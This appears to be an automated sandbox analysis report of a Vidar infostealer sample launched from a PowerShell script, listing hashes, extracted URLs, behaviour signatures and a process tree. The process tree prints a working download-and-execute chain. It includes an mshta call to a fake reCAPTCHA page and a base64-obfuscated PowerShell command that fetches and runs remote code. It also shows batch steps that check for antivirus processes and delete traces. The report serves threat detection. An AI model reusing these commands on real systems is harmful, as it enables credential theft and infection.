Analysis
-
max time kernel
95s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
23/12/2024, 17:44
General
-
Target
run.ps1
-
Size
98B
-
MD5
f06b8028feb204bc56013b2f961ea80c
-
SHA1
8d5eeee9730fcd09b7e46b566d00b28458405457
-
SHA256
cd1dab4f48894954a1c3fec77cb8af692a49853cb7b0c748021bbecbec8496c1
-
SHA512
fbc4f28323c80ccd2faf9030aefecb47846aa379df61f6bcbcaf093691669f375cfcb09a519969d16e0e3b88faf5baaa0538faf3695c95595d501f3839bedc76
Malware Config
Extracted
https://recaptha-verify-8u.pages.dev
Extracted
https://polovoiinspektor.shop/secure/login.txt
Signatures
-
Detect Vidar Stealer 4 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Vidar family
-
Blocklisted process makes network request 6 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 24 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of WriteProcessMemory 50 IoCs
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\run.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://recaptha-verify-8u.pages.dev2⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& {$U=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9wb2xvdm9paW5zcGVrdG9yLnNob3Avc2VjdXJlL2xvZ2luLnR4dA=='));$C=(Invoke-WebRequest -Uri $U -UseBasicParsing).Content;$B=[scriptblock]::Create($C);&$B}"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ai3315op\ai3315op.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9153.tmp" "c:\Users\Admin\AppData\Local\Temp\ai3315op\CSCAF311E0B3E8D464C9139E540759D272.TMP"5⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\vnwjiexk.np2.exe"C:\Users\Admin\AppData\Local\Temp\vnwjiexk.np2.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Forth Forth.cmd & Forth.cmd5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"6⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"6⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 6236156⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Distances6⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Duck" Ix6⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Loud + ..\Kenny + ..\Advisor + ..\Promotes f6⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\623615\Wb.comWb.com f6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\623615\Wb.com" & rd /s /q "C:\ProgramData\KFCJW4E37YCJ" & exit7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /t 108⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 56⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
925KB
MD562d09f076e6e0240548c2f837536a46a
SHA126bdbc63af8abae9a8fb6ec0913a307ef6614cf2
SHA2561300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49
SHA51232de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f
-
Filesize
290KB
MD544bb200868649a063953cf0bb7528502
SHA17db0b074ddb4f52eaf6ecbfbf41ce67a44b0daee
SHA2567d2d6b8d47b9ee4ade15bd0c992190554268f235c18b27ea8c213d474ad6f7d8
SHA5125592078c4aa02737000942fe204111c72c547b0732a26cb776c572441dbe8bcb9dcbe2443ede3fee47899e88e998f2a3b610ced103e834fa34673f28b55e5ba8
-
Filesize
96KB
MD5cf44a9847f3fb78e1b20e0f6058e073a
SHA147517215a4145d9dcddb3306c0fb931c71ddfe9d
SHA256d2e7128b474ac99272c683aaeee8a8f8bdc8638a28d7b5e769c2b894ebc45b31
SHA512eaa9141b5c4bc8fcad07bf71a6dc14990b83b472bb8fbc156aaf694bc4a9fd984793f4bcd4058b6fb3d6fe88ad828bce2a8d44f556d3f67870ac484021510fe4
-
Filesize
61KB
MD5bbe29e56ffe75996e8ca9090d7d77f90
SHA1d9aa67c8d72e772a80a5fe91b5fa2055abd7f703
SHA25609ef3302b1439ce599d2aba0d63131a3c4dcbcba50a37abf97d700f120e5fcc1
SHA512f0270133761b242495f079a91625ee365d2e9b127de3ecc773f0228fdf6e874b53ecfc09ab81ee7c5b0b8c5edba99ca74017692d032c0ba520951b92d267cf3e
-
Filesize
64KB
MD5ee05be18d113eb275f51315fb037f70d
SHA17869c95e14b3b7f62dcff7f1f2466176af343cd5
SHA2560f914bbe769aa4e7b0e26e0fa78714a7213050ef3907ccfa4a1488ce3b20df45
SHA5120c857df0f87b7b4b53492aa743064c11335d1d99ae82d4ea252048d3b7550174224212dc9ee15b075be371b84fd17a5ee3cf1c7094fd0586d90e9f88b2a46045
-
Filesize
476KB
MD5c83a25d37c14b33c8c977950706e4087
SHA16116cf0a57be99402db4c76f72751e33d45b055f
SHA256d84347b22e026490edb739141cd5aee2e1a97ee6050e07b93df005a61ec29f6f
SHA51278ec95011f8ba59a734bc2706cb311201da0014863b374bb9431394d716095887cd1a923dd39442da8d5d0ba9fa6976e1eadf4eaa836e9c6583d322f9dd55c8f
-
Filesize
82KB
MD59055cd07ebc236d6a9ed59a00976303f
SHA1b55ef932607c144e36b6729f59a0df49af31c546
SHA256d08694349bc677e90fe0d2e398d84022057b042c386d861273e6b7339f532249
SHA5129344045948b93c8305703e9e5e2ed6bb58535028ad58881e06727ae88b058e19e25fd7e790739383b1a3e1b2f11f73afac7fd9dca7bb677cc90da426d3996abe
-
Filesize
86KB
MD5ad99fa74f69f99f32fa2d01579bf7080
SHA10b94621b4c8d976de408e736811af2a2b231dd85
SHA25650d7f8da31679bb21dd88a973c03ea2d5da501f7b241a740bc1fa98c5b53ccbb
SHA51277ae1948f088abd47ab53d8c228dff2b0479f73a455cc33a4f2ad3bf8f855579fc07a1d6e962c4d822de63fe3e0b01973b7d1608f12bd6893a04ec9619b9c10b
-
Filesize
25KB
MD52cbba7ba80508761f55ffd4beb853102
SHA1fe71788dca26e77f22548ffc39f01bc8f55d2823
SHA256b5f643db2b4dfc24718865707806f6dd22d9a54eae16a603c7feffe9d98b49ce
SHA51214ab42b3b60d7e7032b0836d0a53670a2d231200121da5618b06962a401903720a736df28d049f7cb3fe21e8da09acc6dafae5b86bb6afbd79307d99b80c6c09
-
Filesize
125KB
MD5b472c3173839488298c86f463853d522
SHA14ea19e681d58dbd02318522523117290e5c34f64
SHA2560ff238b71b54c5f33f282ca1e5c3d448bdc37ad8e67ef818766eaf965ee39b8d
SHA5126b1a0b419229c0e101624d293640e12ca15de1063ea1ed8f1223072c5071cd952d57e2d7fe88e7f68b295e52b899b3773545b6e7e4fc127d0742814eb2a645e8
-
Filesize
7KB
MD59748ff1c8dd58352459f2451049af2a2
SHA1c0a19f1e749fa58bc03b7207d1be88d054c6c16d
SHA256f6d4c8ebb3c24d734f4888df2ceca12f2836bb999f58e78dcd05cff4b27c135b
SHA5123eb9d6beac6ea2c1fd8ecfcbcf159459b0b236b2c997191e84da058d5162cc9a77d132ebc42fde26891e13959ddc2a81bc8cc47c97111e42c7e5ba4e6e33ee9f
-
Filesize
1KB
MD59adb0ca1567f35d30c412cbe89a53027
SHA1a32e1d9eb580ce408943b1d91372091967b18be9
SHA25629b99f845b00ea87a7da8b57001bf0561d5c87ebdda8caefaa3248edd7c87dca
SHA512986234c956d90c732656dd16de58b528af17040364311f89f8d98a45736a7dd9c6394d4c36028b73575ded030654a84512711fa14153f079284508e964f40da6
-
Filesize
75KB
MD54f00e7d3c58ab52d2c6e8b6935b14e0d
SHA1634aaef4c09cc4f8be78c7a8d1b7cb72f184c073
SHA2561629fda7c2acc6e2c91b128fcd713efc4282fe6ac169d3804f639c16957efff0
SHA51264873a21e2c0a581f9ab4ff6933fabcf117860998e73227340d0666d2c0e7017de8f57db8216dd643f9daf8c11ce73eef41e986e55ee7b64aad30435a6d5bde1
-
Filesize
56KB
MD58daac6f10e63c4e0b8dddecaf6b8e0ef
SHA139441368910496dc889fe74ae20963e53f08a459
SHA2563a479c5821fce8189ca2d04b48f7078f2266e8fd80e57ca4b6f4b9b2b724b26f
SHA5127064cd9bbac4f9b792528b98b1f86bb9a283481f16c85a792d34c0d2f30a9bc4200cdf12eadfffc6720ef64b2df4187828dc7df0e836aeb7bb2ab6ccd022c93c
-
Filesize
136KB
MD56567d0c4aca999258d881932a4a6925a
SHA1c82d413aa3d63f8b540f5ec85cb6993323c80a39
SHA256b54a2ab660d285af9f9e829d97a7550b1640803c1bea965e747e92cb29a54ca3
SHA5124cb7fa0c47009134d29523cfa005541eeb4f755bb884117a25983f3c92bd69a7d4f6499429074f5f9ff0597e4abc1c08cd804f78bcbb694d84f1bb522efc5dba
-
Filesize
63KB
MD5d46df033b2afd716f44e8e9482b0c3f1
SHA1058928cf46326c10f4f11bc817c387f4a3ad1a49
SHA256d96c4cc9b7c57e3999b16a9ce661208b6d7782c6d12d9b7054cf737a18765d11
SHA5122436c4733b94a8b8ec58d321fa4533af7ad1cae69bd4b5e7cb4e7d50b00fb369fd421664f0f1851f7634cba86e6ed81622c3099974ced2d81a9279616bab4f46
-
Filesize
86KB
MD5ff2ceec537d5b6f00e079f35a28eca2f
SHA102e6b54bf4bb40e8aa2e633331f1a6fcb8e4fd43
SHA256a42a43439f637db2cd812fcf086388808bbf5dd103e7e7d20590707d0c38597e
SHA51226bfa8b19d875d41601f538a99d4eaa0fc04388f6d0689e2b4d22607aac5261e03e42d2e2804690ce1d6fc3a9317a969b1d0d94568cbd6a73843e7fdefc1989b
-
Filesize
1KB
MD5b84250176960ace90acf5afb890ecd48
SHA15d7d6d31cd037be59c24a67b2270f60eaccae48d
SHA2568339d31771e9ca916f95a75cc43da61a52c1ada7240dfd693066dfba1cce7346
SHA5129407edfd01ed2dab73dc318c37bb34d35c9e8b54e5a59f50856e1b3b2a479cc12a1e3ec4636798337ceb3a80e4acf751f6986b8a285ef70885a0509484f2258b
-
Filesize
87KB
MD50d9676b0ace617d2f4b1e3d382fff695
SHA15b60c826a38c70430bab8017b76a27d945fbdbe3
SHA256738d4b9e1c15109b85d7f0a06748dcf4ec018a0ef4abe917552f59a84ae6c03d
SHA512b81d208d807634b9be1fc42f036fd4da41e50f84edd232b736f8588b22c5a4cf7534196ce6c873f2e9bab264ad4a11a9f5cbd3e6037e85dae58e766e81369188
-
Filesize
119KB
MD519046e554a09e864445f82438d104a1a
SHA10706e729f7a4e535050dff2b2830781afc47d38e
SHA25605f50ab0792f99e7d107ec120f436a093d94d97b75bcde861e19fa29f842c8f1
SHA5122c9c9385bcec66ba5dd11dff14e383f72fc67e3be3f3529cbae8b2a4741f13b1b931a692c4b6f7ba2a5a0a9958141f7e6100d0ea631feee887fa6d279ad2e24a
-
Filesize
70KB
MD5de0be63d4a9cd3b9d4137ec3c72d0951
SHA119f744279539dd41f4e591c5efe35101f3a7f5bc
SHA2566f2d36e5713cd1a319a8ce22171b16c95c9d0c3d7f75ff6a93e1ebdf19dc8977
SHA5123ab18e5de48ad1aff696855a7925d32f2e3fa3682f9cd421d7337caa9b35c9f3070b75c20711be9e016959fa8ed17176cc3fccf5af8bb2304edc57fbf37b4b82
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD57bd820883560c49b6339c61c8bd38781
SHA11c667f77534a5be650dfde4a7b89384166e4d01b
SHA25680b104cf01cc86216836a92922f3042d899ad11e5af7bc149d93b1f4cb782dac
SHA51291c35a404e735a7ee486c2885cdc64343901996f953d0bf3164f547961d22242278de3f5e2ee79938a051b3f000b1becd4bf6aea12513b0fc0b9514f1b18bd36
-
Filesize
1.1MB
MD506342512b7bcdfdda8d6ea8e2d5a24e4
SHA15a656ac27d5a03ee63f08dd499bacd01e0a12c3f
SHA25689b55665c76315777e1f2a9a5be784fd2590b917388f657c6f5c2caa055e87c2
SHA5125824c39a30b7acacd949812bafcf99afcdc95361b2196567aae4e1f2445803c37971a572537c132a01b930e204745ccf7f082386147ea3b611c745eef2ea3eb4
-
Filesize
652B
MD52896e5506d5d459a73820df8c37e21cd
SHA197f2149f33670923b8ee4a90ece8f86ed387a643
SHA25639263349a0206e77fd282236756276b6b90965069b88e44fe48bea786c62040b
SHA512b3b69ea597087c5ee930c6f8407d2f55cf7791ca649a4ead5550518c91bd2bc80ec10cebd8517ed12258cbd93ff7e2c29700909f58be42070149ea63d2c981f8
-
Filesize
648B
MD58539b6708ddc98df3a1cd74954dc89bd
SHA1a69c850c26e8ecd62a3dc997164d4c92617fa40d
SHA2560b0d3909c6bdbccc83f6206dd9e50cb8fcfa9cbdc250ac5d926cd0f8698adc3d
SHA512c7d9a203876b75dba73305732026b0d0c6bc699870731a8a67066c1ec068cc6b05a5b3ab64384005f1dcf81fd0a5d5713a30885a56016126258db76d9a2f5afa
-
Filesize
369B
MD594ba18201e8f00eb91e2aae45909e35a
SHA1337cf91cec30232fc08131d182bd5281b8fa5a96
SHA256c0717b64d75fcbae381b5e03f8ca1298c88103f825a7d286c858eeecfc0ca11d
SHA512d277b20e418a2505fe6cec1ca323f8b826a46b84736a0ee6ce022841c230fa1050f0b834ce80d9a6364d186cea49330b1e4d5c9973786234dfb1707a6c97d4a3
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
5.2MB
-
Filesize
320KB
-
Filesize
712KB
-
Filesize
1.8MB
-
Filesize
32KB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB